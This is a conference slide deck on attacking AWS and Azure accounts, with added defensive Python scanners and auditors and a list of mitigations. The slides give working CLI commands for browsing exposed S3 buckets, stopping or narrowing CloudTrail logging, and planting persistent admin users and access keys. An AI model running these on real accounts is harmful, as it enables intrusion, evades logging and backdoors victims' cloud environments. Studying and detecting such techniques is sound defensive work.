PWNED CLOUD SOCIETY: Exploiting and Expanding Access within Azure & AWS
Bryce Kunz - @TweekFawkes
Prior Work Experience:
• Adobe DMa – Red Team
• DoD/NSA – Exploitation
• DHS/OneNet – Defense
Trainings & Sessions
• RSA – mesos/docker
• SAINTCON – osquery
• BsidesLV – mesos/docker
• Derbycon – WhiteLightning
CLOUD… SO MUCH…
… only one thing is for sure … there is SOOO MUCH of it: AWS, Azure, Google, Rackspace, etc…
NEW-NEW
… they want that new-new …
OLD IS NEW
… but really it's not that much different …
OLD WAYS
… push code … jenkins … do work son …
(diagram labels: Dev, Code, CI, Batch Jobs, Web)
NEW
… code … some overpriced hipster services … do work …
(diagram labels: Dev, Code, CodeDeploy, CI, Batch, Lambda, S3 Bucket, Web)
ADMINS
… admin …
(diagram labels: AD/LDAP, Admin, Dev, Code, CI, Batch Jobs, Web)
NEW ADMIN
… admins got to admin …
(diagram labels: AD/LDAP, Admin, Dev, Management Console, Code, CodeDeploy, CI, Batch, Lambda, S3 Bucket, Web)
DEVOPS
… DevOp-ocalypse …
(diagram labels: AD/LDAP, DevOps, Management Console, Code, CodeDeploy, CI, Batch, Lambda, S3 Bucket, Web)
BAD DAYS
…happen… $50k!?!?!? …EC2 instances destroyed…
INITIAL ACCESS
Find AWS Secrets
• Open Source Intel
  - PasteBin.com
  - GitHub.com
• Code Repositories
  - BitBucket, GitLab
  - Gerrit, GitBlit, Git
  - SVN, etc…
• Deployment Tools
  - Puppet, etc…
  - Jenkins, etc…
• Configuration Files
  - Classic Hacks
    -- D/L Secrets
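The defensive counterpart to the sources listed above is scanning the same places (pastes, repos, CI job configs, dotfiles) for credential-shaped tokens before an outsider does. The block below is an added example, not material from the talk: it scans a constructed set of files for AWS access key IDs (20 characters beginning with AKIA) and, next to a "secret" label, 40-character secret keys, and reports them redacted so the report itself does not re-leak the value. The file contents and key values are constructed placeholders ("AKIAIOSFODNN7EXAMPLE" is the placeholder key from the AWS documentation); the same `scan_files` function can be fed the staged files of a pre-commit hook.

```python
import re

# Constructed sample files (not from the talk): placeholder key values only.
SAMPLE_FILES = {
    "config/settings.py": (
        'AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"\n'
        'AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"\n'
    ),
    "jenkins/jobs/deploy/config.xml": "<param>AKIAJEXAMPLE1234567Q</param>\n",
    "README.md": "Run `aws configure` locally; never commit credentials.\n",
    ".aws/credentials": (
        "[default]\n"
        "aws_access_key_id = AKIA1234567890ABCDEF\n"
        "aws_secret_access_key = abcdefghijklmnopqrstuvwxyz0123456789ABCD\n"
    ),
}

# Access key IDs are 20 characters starting with "AKIA". Secret keys are 40
# characters of base64-style text and are only flagged when they follow a
# "secret" label, which keeps false positives (hashes, tokens) down.
ACCESS_KEY_RE = re.compile(r"(?<![A-Z0-9])AKIA[0-9A-Z]{16}(?![A-Z0-9])")
SECRET_KEY_RE = re.compile(
    r"(?i)(?:aws_secret_access_key|secret)\W{0,4}([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+])"
)


def redact(value):
    """Keep just enough of a key to identify it in a ticket without re-leaking it."""
    return value[:4] + "..." + value[-4:]


def scan_text(path, text):
    """Return (path, line number, kind, redacted value) for each credential-looking token."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in ACCESS_KEY_RE.finditer(line):
            findings.append((path, lineno, "access_key_id", redact(m.group(0))))
        for m in SECRET_KEY_RE.finditer(line):
            findings.append((path, lineno, "secret_access_key", redact(m.group(1))))
    return findings


def scan_files(files):
    """Scan a {path: text} mapping, e.g. the staged files in a pre-commit hook."""
    findings = []
    for path, text in sorted(files.items()):
        findings.extend(scan_text(path, text))
    return findings


def summarize(findings):
    """Count findings per kind, e.g. {"access_key_id": 3, "secret_access_key": 2}."""
    counts = {}
    for _, _, kind, _ in findings:
        counts[kind] = counts.get(kind, 0) + 1
    return counts


if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print("%s:%d %s %s" % finding)
    print(summarize(scan_files(SAMPLE_FILES)))
```

A hit in a repository is a rotation event, not just a cleanup: the key must be treated as exposed from the moment it was pushed, because history, forks and paste mirrors keep it alive after the line is deleted.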
WHAT… is the point?
Services
- Many Services
- API Access
- User Access
SO MANY…
TYPES: API, USERS
SETUP
Preparation
• New EC2 Instance
• Set up AWS Tools
On an Ubuntu 16.x EC2 instance…
    apt-get update
    apt-get install python-pip
    pip install aws-shell
    pip install awscli
S3 BUCKETS
S3 Buckets
• Find Region
    ping -c3 exam.ple
    dig +nocmd exam.ple any +multiline +noall +answer
    nslookup 54.231.184.255
• Browse Files (World Browsable)
    aws s3 ls s3://exam.ple/ --no-sign-request --region us-west-2
    aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
• Sensitive Files
    aws s3 ls s3://...exam.ple/ --no-sign-request --region us-west-2
    aws s3 sync s3://…exam.ple/ . --no-sign-request --region us-west-2
  - GIT
  - SVN
  - etc…
    git log
    git checkout f7c…
(diagram labels: S3 Bucket, Amazon S3)
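The `--no-sign-request` listings above succeed because the bucket grants the anonymous AllUsers group, either through its ACL or through a bucket policy whose Principal is `*`. The block below is an added example, not the talk's code: it evaluates documents in the shape of `aws s3api get-bucket-acl` and `aws s3api get-bucket-policy` output and reports which grants make a bucket world-listable or world-readable. The ACL and policy documents, the bucket name `exam.ple`, the owner ID and the account number are constructed placeholders; `get-bucket-policy` wraps the policy as a JSON string under "Policy", which `parse_policy_cli_output` unwraps.

```python
import json

# Group URIs AWS uses for "everyone": anonymous callers and any signed-in AWS account.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}
READ_OR_LIST = {"s3:ListBucket", "s3:GetObject", "s3:*", "*"}

# Constructed documents (placeholder IDs), shaped like the CLI's JSON output.
OPEN_ACL = {"Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id-placeholder"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
]}
PRIVATE_ACL = {"Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id-placeholder"}, "Permission": "FULL_CONTROL"},
]}
OPEN_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicList", "Effect": "Allow", "Principal": "*", "Action": ["s3:ListBucket"],
     "Resource": "arn:aws:s3:::exam.ple"},
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": {"AWS": "*"}, "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::exam.ple/*"},
]}
SCOPED_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "DeployRoleRead", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/deploy"},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::exam.ple/*"},
]}
CLI_POLICY_OUTPUT = json.dumps({"Policy": json.dumps(OPEN_POLICY)})


def parse_policy_cli_output(text):
    """get-bucket-policy returns {"Policy": "<policy document as a JSON string>"}."""
    return json.loads(json.loads(text)["Policy"])


def acl_public_grants(acl):
    """(group, permission) pairs granted to everyone; READ on the bucket ACL allows listing."""
    hits = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            hits.append((PUBLIC_GROUPS[grantee["URI"]], grant.get("Permission")))
    return hits


def _principal_is_everyone(principal):
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def _as_list(value):
    return value if isinstance(value, list) else [value]


def policy_public_statements(policy):
    """Sids of unconditioned Allow statements that give list/read to everyone."""
    hits = []
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow" or not _principal_is_everyone(st.get("Principal")):
            continue
        if st.get("Condition"):
            continue  # conditioned grants (e.g. by source IP) need manual review, not flagged here
        if set(_as_list(st.get("Action", []))) & READ_OR_LIST:
            hits.append(st.get("Sid", "<no Sid>"))
    return hits


def is_world_browsable(acl, policy):
    return bool(acl_public_grants(acl)) or bool(policy_public_statements(policy))


if __name__ == "__main__":
    print(acl_public_grants(OPEN_ACL), policy_public_statements(OPEN_POLICY))
    print(is_world_browsable(PRIVATE_ACL, SCOPED_POLICY))
```

Run this across every bucket in an account on a schedule; the anonymous `aws s3 ls` from the slides is then the confirmation step, not the discovery step.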
LEVERAGE SECRETS
Preparation
• New EC2 Instance
• Set up AWS Tools
• Leverage Secrets
CONFIGURE
    aws configure --profile example
VERIFY
(remove the spaces around the = character for easier scripts)
(diagram labels: AWS CLI, AWS Cloud)
WHOAMI
    aws --profile example sts get-caller-identity
IAM WHO
    aws --profile example iam get-user
Survey Access
• Who Are We?
• IAM Who?
(diagram labels: AWS CLI, AWS Cloud)
LOGGING
Survey Access
• Who Are We?
• Logging?
LOGGING?
    aws --profile api_cloudtrail cloudtrail describe-trails
STOP-LOGS
    aws --profile api_cloudtrail configure set region us-east-1
    aws --profile api_cloudtrail cloudtrail stop-logging --name "arn:aws:cloudtrail:us-east-1:…:trail/…"
OPSEC?
NO MULTI
    aws --profile api_cloudtrail configure set region us-east-1
    aws --profile api_cloudtrail cloudtrail update-trail --name "arn:aws:cloudtrail:us-east-1:…:trail/…" --no-is-multi-region-trail --no-include-global-service-events
Stops logging in all regions…
• EXCEPT the Home Region
OPSEC…
(diagram labels: AWS CloudTrail, AWS CLI, AWS Cloud)
PERSIST
Persistence
• Session Token
  - Valid for 12 Hours
    aws --profile api_cloudtrail sts get-session-token
  SETUP
    vi ~/.aws/credentials
  SESSION
    aws --profile sessionTokens sts get-caller-identity
• Add Key
  To an already existing user….
    aws --profile api_iam iam list-users
    aws --profile api_iam iam create-access-key --user-name test
• Add User
    aws --profile api_iam iam create-user --user-name mryan
    aws --profile api_iam iam add-user-to-group --user-name mryan --group-name Admin
  ADD KEY
    aws --profile api_iam iam create-access-key --user-name mryan
  ADD PASS
    aws --profile api_iam iam create-login-profile --user-name mryan --password examplepass
(diagram labels: AWS CLI, AWS Cloud)
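Every step in the two sections above (stopping or narrowing the trail, then creating users, keys and console passwords) is itself an API call that CloudTrail records, and the `update-trail` call that limits a trail to its home region is still written by that home region. The block below is an added example, not the talk's code, covering both the LOGGING and PERSIST sections: it triages records in the CloudTrail file format (a JSON object with a "Records" list) and flags trail tampering and persistence-style IAM changes, ranking a key created for a user other than the caller above a user rotating their own key. The records, account number, trail name and user names are constructed placeholders.

```python
import json
import re

ADMIN_GROUP_RE = re.compile(r"admin|power|root", re.IGNORECASE)
TRAIL = "arn:aws:cloudtrail:us-east-1:123456789012:trail/main"  # placeholder ARN


def _event(time, source, name, actor, region, params):
    """Build a CloudTrail record trimmed to the fields this triage uses."""
    return {"eventTime": time, "eventSource": source, "eventName": name,
            "userIdentity": {"type": "IAMUser", "userName": actor},
            "awsRegion": region, "requestParameters": params}


# Constructed records (not real events) mirroring the sequence in the slides.
SAMPLE_RECORDS = [
    _event("2017-03-10T14:02:11Z", "cloudtrail.amazonaws.com", "DescribeTrails", "api_cloudtrail", "us-east-1", None),
    _event("2017-03-10T14:03:40Z", "cloudtrail.amazonaws.com", "StopLogging", "api_cloudtrail", "us-east-1", {"name": TRAIL}),
    _event("2017-03-10T14:05:02Z", "cloudtrail.amazonaws.com", "UpdateTrail", "api_cloudtrail", "us-east-1",
           {"name": TRAIL, "isMultiRegionTrail": False, "includeGlobalServiceEvents": False}),
    _event("2017-03-10T14:09:17Z", "iam.amazonaws.com", "CreateUser", "api_iam", "us-east-1", {"userName": "mryan"}),
    _event("2017-03-10T14:09:30Z", "iam.amazonaws.com", "AddUserToGroup", "api_iam", "us-east-1",
           {"userName": "mryan", "groupName": "Admin"}),
    _event("2017-03-10T14:09:45Z", "iam.amazonaws.com", "CreateAccessKey", "api_iam", "us-east-1", {"userName": "mryan"}),
    _event("2017-03-10T14:10:05Z", "iam.amazonaws.com", "CreateLoginProfile", "api_iam", "us-east-1", {"userName": "mryan"}),
    _event("2017-03-10T14:12:00Z", "iam.amazonaws.com", "CreateAccessKey", "alice", "us-east-1", {"userName": "alice"}),
]
SAMPLE_LOG_FILE = json.dumps({"Records": SAMPLE_RECORDS})


def classify(rec):
    """Return (severity, rule) pairs for one record; empty list when nothing matches."""
    name = rec.get("eventName")
    params = rec.get("requestParameters") or {}
    actor = (rec.get("userIdentity") or {}).get("userName", "<unknown>")
    alerts = []
    if name in ("StopLogging", "DeleteTrail"):
        alerts.append(("HIGH", "trail-logging-disabled"))
    elif name == "UpdateTrail":
        # Narrowing to one region or dropping global (IAM/STS) events blinds the trail.
        if params.get("isMultiRegionTrail") is False or params.get("includeGlobalServiceEvents") is False:
            alerts.append(("HIGH", "trail-scope-reduced"))
    elif name == "CreateAccessKey":
        target = params.get("userName") or actor  # no userName means "for myself"
        if target != actor:
            alerts.append(("HIGH", "access-key-for-other-user"))
        else:
            alerts.append(("LOW", "access-key-self"))
    elif name == "CreateUser":
        alerts.append(("MEDIUM", "iam-user-created"))
    elif name == "CreateLoginProfile":
        alerts.append(("MEDIUM", "console-password-set"))
    elif name == "AddUserToGroup":
        severity = "HIGH" if ADMIN_GROUP_RE.search(params.get("groupName", "")) else "MEDIUM"
        alerts.append((severity, "user-added-to-group"))
    return alerts


def triage(records):
    alerts = []
    for rec in records:
        actor = (rec.get("userIdentity") or {}).get("userName", "<unknown>")
        for severity, rule in classify(rec):
            alerts.append({"time": rec.get("eventTime"), "actor": actor,
                           "event": rec.get("eventName"), "severity": severity, "rule": rule})
    return alerts


def parse_cloudtrail_file(text):
    """CloudTrail log files delivered to S3 are {"Records": [...]}."""
    return json.loads(text).get("Records", [])


def count_by_severity(alerts):
    counts = {}
    for alert in alerts:
        counts[alert["severity"]] = counts.get(alert["severity"], 0) + 1
    return counts


if __name__ == "__main__":
    for alert in triage(parse_cloudtrail_file(SAMPLE_LOG_FILE)):
        print(alert)
```

The detection only helps if the log store outlives the attacker's access: deliver the trail to a bucket (or a second account) that the compromised keys cannot write to, and alert on the StopLogging/UpdateTrail events themselves rather than on what stops arriving afterwards.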
NEW EC2
EC2 META
Metadata Service: 169.254.169.254
    curl http://169.254.169.254/latest/meta-data/
RFC-3927: https://tools.ietf.org/html/rfc3927
AWS: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
AWS Query Tool: https://aws.amazon.com/code/1825
AZURE META
Metadata Service: 169.254.169.254
    curl http://169.254.169.254/metadata/v1/maintenance
    curl http://169.254.169.254/metadata/v1/InstanceInfo
(these are mostly useless for hackers…) but useful information is copied into the … /var/lib/waagent directory when the instance is created… (root access needed)
• IP address, hostname, subscription ID, resource group name, etc…
SNAPS & IAM
    aws --profile api_ec2 ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
    mount /dev/xvdb1 /mnt
    find /mnt -type f -mtime -1 2>/dev/null | grep -v "/var/" | grep -v "/proc/" | grep -v "/dev/" | grep -v "/sys/" | grep -v "/run/" | less
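Two audits a defender runs against the techniques on these slides: which EBS snapshots are shared publicly (anyone can `create-volume` from those, as in SNAPS & IAM, without any key for the owning account), and which instances still answer the metadata endpoint without a session token (IMDSv2, a control AWS added after this 2017 talk, which removes the plain `curl` read shown under EC2 META). This is an added example, not the talk's material; the instance and snapshot IDs are placeholders and the documents are constructed in the shape of `aws ec2 describe-instances` and `aws ec2 describe-snapshot-attribute --attribute createVolumePermission` output.

```python
# Constructed CLI-shaped documents with placeholder IDs (not a real account).
DESCRIBE_INSTANCES = {"Reservations": [{"Instances": [
    {"InstanceId": "i-0aaaaaaaaaaaaaaaa",
     "MetadataOptions": {"State": "applied", "HttpEndpoint": "enabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0bbbbbbbbbbbbbbbb",
     "MetadataOptions": {"State": "applied", "HttpEndpoint": "enabled", "HttpTokens": "required", "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0cccccccccccccccc",
     "MetadataOptions": {"State": "applied", "HttpEndpoint": "disabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}},
]}]}
SNAPSHOT_ATTRIBUTES = [
    {"SnapshotId": "snap-0aaaaaaaaaaaaaaaa", "CreateVolumePermissions": [{"Group": "all"}]},
    {"SnapshotId": "snap-0bbbbbbbbbbbbbbbb", "CreateVolumePermissions": [{"UserId": "123456789012"}]},
    {"SnapshotId": "snap-0cccccccccccccccc", "CreateVolumePermissions": []},
]


def instances_allowing_imdsv1(describe_instances):
    """Instances whose metadata endpoint is on but does not require a session token."""
    ids = []
    for reservation in describe_instances.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            opts = inst.get("MetadataOptions", {})
            # A disabled endpoint cannot be read at all, so it is not reported.
            if opts.get("HttpEndpoint", "enabled") == "enabled" and opts.get("HttpTokens") != "required":
                ids.append(inst["InstanceId"])
    return ids


def snapshot_sharing(attr):
    """'public' (Group all), 'shared:<account ids>' or 'private' for one snapshot attribute doc."""
    perms = attr.get("CreateVolumePermissions", [])
    if any(p.get("Group") == "all" for p in perms):
        return "public"
    if perms:
        return "shared:" + ",".join(p["UserId"] for p in perms if "UserId" in p)
    return "private"


def snapshot_report(attrs):
    return {a["SnapshotId"]: snapshot_sharing(a) for a in attrs}


if __name__ == "__main__":
    print("IMDSv1 still allowed:", instances_allowing_imdsv1(DESCRIBE_INSTANCES))
    print(snapshot_report(SNAPSHOT_ATTRIBUTES))
```

Public snapshots are the quiet version of the world-browsable bucket: the data leaves the account without a single API call against it, so the audit belongs on the same schedule as the bucket check.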
HARD BOOT
Horrible OPSEC but it works…
- Power off a server
- Mount the server's hard drive using another EC2
- Modify the server for remote access (e.g. add an SSH key to root user)
- Power back on the server & PROFIT!
MITIGATIONS
• Single Purpose Secrets
• Limit the access of each secret
• Create roles and limit the access of each role
• You can ACL off secrets to only work from certain IP addresses
• Log API calls (e.g. CloudTrail)
• Never use root secrets (use as a break glass account only)
• Rotate Secrets Frequently
• Encrypt secrets within GIT and other data stores
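The "only work from certain IP addresses" mitigation is an IAM condition on `aws:SourceIp`: a leaked key that is pasted into an EC2 instance elsewhere (the SETUP slide) then fails every call, even though the key itself is valid. The block below is an added example, not the talk's material: a constructed policy that denies everything from outside two placeholder ranges and allows only read access to one bucket, plus a deliberately simplified evaluator (explicit Deny wins, then any matching Allow, else implicit deny; resource matching is left out so the example stays about the IP condition) that shows the decision for requests from inside and outside those ranges. The CIDRs, bucket name and Sids are assumptions to replace with your own.

```python
import fnmatch
import ipaddress

# Constructed policy: placeholder office/VPN ranges (TEST-NET addresses), placeholder bucket.
IP_RESTRICTED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "DenyOutsideAllowedRanges", "Effect": "Deny", "Action": "*", "Resource": "*",
         "Condition": {"NotIpAddress": {"aws:SourceIp": ["203.0.113.0/24", "198.51.100.7/32"]}}},
        {"Sid": "AllowDeployReadOnly", "Effect": "Allow",
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::deploy-artifacts", "arn:aws:s3:::deploy-artifacts/*"]},
    ],
}


def _ip_in(ip, cidrs):
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(c, strict=False) for c in cidrs)


def _condition_holds(condition, source_ip):
    """Only the IpAddress / NotIpAddress operators on aws:SourceIp are modelled here."""
    for operator, key_values in (condition or {}).items():
        cidrs = key_values.get("aws:SourceIp")
        if cidrs is None:
            continue
        cidrs = cidrs if isinstance(cidrs, list) else [cidrs]
        if operator == "IpAddress" and not _ip_in(source_ip, cidrs):
            return False
        if operator == "NotIpAddress" and _ip_in(source_ip, cidrs):
            return False
    return True


def _action_matches(pattern, action):
    # IAM action names are case-insensitive and allow '*' wildcards.
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def evaluate(policy, action, source_ip):
    """Simplified IAM decision for one action from one source IP (resources not checked)."""
    decision = "ImplicitDeny"
    for st in policy["Statement"]:
        actions = st["Action"] if isinstance(st["Action"], list) else [st["Action"]]
        if not any(_action_matches(p, action) for p in actions):
            continue
        if not _condition_holds(st.get("Condition"), source_ip):
            continue
        if st["Effect"] == "Deny":
            return "Deny"  # an explicit Deny is final
        decision = "Allow"
    return decision


if __name__ == "__main__":
    for ip in ("203.0.113.45", "192.0.2.10"):
        print(ip, evaluate(IP_RESTRICTED_POLICY, "s3:GetObject", ip))
```

One caveat for the real service: `aws:SourceIp` is the public address AWS sees, so a broad Deny like this also blocks requests that AWS services make on the principal's behalf and calls that arrive through VPC endpoints (which carry `aws:VpcSourceIp` instead); scope the Deny to the human or CI principals that genuinely only operate from fixed addresses.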
THANKS!
References
• http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/hint2.html
• https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains
• http://flaws.cloud/
• https://danielgrzelak.com/disrupting-aws-logging-a42e437d6594
• https://danielgrzelak.com/backdooring-an-aws-account-da007d36f8f9
• https://danielgrzelak.com/exploring-an-aws-account-after-pwning-it-ff629c2aae39
• http://docplayer.net/24014561-Defending-the-cloud-from-the-full-stack-hack.html

AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
Generating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using SmithyGenerating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using Smithy
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 

Pwned Cloud Society - BsidesSLC 2017

  • 20. GITHUB Find AWS Secrets • Open Source Intel • - PasteBin.com • - GitHub.com
  • 21. REPOS Find AWS Secrets • Open Source Intel • Code Repositories • - BitBucket, GitLab • - Gerrit, GitBlit, Git • - SVN, etc…
  • 22. DEPLOY ACCESS Find AWS Secrets • Open Source Intel • Code Repositories • Deployment Tools • - Puppet, etc… • - Jenkins, etc…
  • 23. HACK & D/L ACCESS Find AWS Secrets • Open Source Intel • Code Repositories • Deployment Tools • Configuration Files • - Classic Hacks • -- Download the secrets (credential files, environment files, deploy configs) from any host you land on
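The hunt described on the INITIAL ACCESS slides (code repositories, deployment tools, configuration files) is easy to automate once you have a checkout or a downloaded config tree. The scanner below is an added example, not code from the talk: it walks a directory for AWS access key IDs (AKIA/ASIA prefixes) and for 40-character secrets that sit next to a `secret`/`aws_secret_access_key` hint, and uses a Shannon-entropy floor to throw away placeholder values. The sample tree it builds is constructed here; the key values in it are AWS's own documentation examples, not live credentials.

```python
"""Scan a checkout or config tree for leaked AWS credentials.

Added example, not from the talk: it automates the "code repositories,
deployment tools, configuration files" hunt from the INITIAL ACCESS slides
as a local scanner. The sample tree is constructed below; the key values in
it are AWS's documentation examples, not live credentials.
"""
import math
import os
import re
import tempfile
from dataclasses import dataclass
from typing import List

# Long-term access key IDs start with AKIA, STS temporary ones with ASIA.
ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")
# A secret access key is 40 base64-ish characters; demand a hint word shortly
# before it so ordinary hashes and tokens do not match.
SECRET_RE = re.compile(
    r"(?i)(?:aws_?secret_?access_?key|secret)[^\n]{0,20}?['\"=:\s]"
    r"([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+])"
)
# .git objects are zlib-compressed, so grepping them is pointless; history
# is searched with git log / git checkout as on the S3 slides.
SKIP_DIRS = {".git", ".svn", "node_modules", "__pycache__"}
MIN_SECRET_ENTROPY = 3.5   # bits/char; placeholders such as "xxxx..." score ~0


@dataclass
class Finding:
    path: str      # relative to the scanned root
    line: int
    kind: str      # "access_key_id" or "secret_access_key"
    value: str


def shannon_entropy(s: str) -> float:
    """Bits per character of s; real secrets sit well above English text."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def scan_text(text: str, path: str) -> List[Finding]:
    findings: List[Finding] = []
    for no, line in enumerate(text.splitlines(), start=1):
        for m in ACCESS_KEY_RE.finditer(line):
            findings.append(Finding(path, no, "access_key_id", m.group(1)))
        for m in SECRET_RE.finditer(line):
            if shannon_entropy(m.group(1)) >= MIN_SECRET_ENTROPY:
                findings.append(Finding(path, no, "secret_access_key", m.group(1)))
    return findings


def scan_tree(root: str) -> List[Finding]:
    """Walk root (skipping VCS metadata) and return every credential found."""
    findings: List[Finding] = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            try:
                with open(full, encoding="utf-8", errors="ignore") as fh:
                    findings.extend(scan_text(fh.read(), rel))
            except OSError:
                continue
    return findings


# Constructed sample tree: a credentials file, a Jenkins env file holding a
# placeholder, a key pasted into source, and a README that only names a variable.
SAMPLE_FILES = {
    ".aws/credentials": (
        "[default]\n"
        "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
        "aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    ),
    "deploy/jenkins.env": "AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n",
    "src/app.py": 'S3_KEY = "ASIAIOSFODNN7EXAMPLE"  # temporary key pasted into code\n',
    "README.md": "Set AWS_ACCESS_KEY_ID in your environment before deploying.\n",
}


def build_sample_tree() -> str:
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="pwned-cloud-")
    for rel, content in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f"{f.path}:{f.line}: {f.kind} {f.value[:4]}...{f.value[-4:]}")
```

Point it at a cloned repository, a Puppet or Jenkins workspace, or a downloaded `~/.aws` directory; the placeholder in `jenkins.env` is dropped by the entropy check while the two real-looking key IDs and the secret are reported.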
  • 24. WHAT… is the point? Services • Many Services • API Access • User Access
  • 25. SO MANY …
  • 26. TYPES …
  • 27. API …
  • 28. USERS …
  • 29. SETUP Preparation • New EC2 Instance • Setup AWS Tools. On an Ubuntu 16.x EC2 instance:
      apt-get update
      apt-get install python-pip
      pip install aws-shell
      pip install awscli
  • 30. S3 BUCKETS … S3 Bucket / Amazon S3
  • 31. REGION S3 Buckets • Find Region: resolve the target name, then reverse-resolve the S3 address it points at; the PTR name AWS returns carries the region you must pass to the CLI
      ping -c3 exam.ple
      dig +nocmd exam.ple any +multiline +noall +answer
      nslookup 54.231.184.255
  • 32. S3 BUCKETS S3 Buckets • Find Region • Browse Files
      aws s3 ls s3://exam.ple/ --no-sign-request --region us-west-2
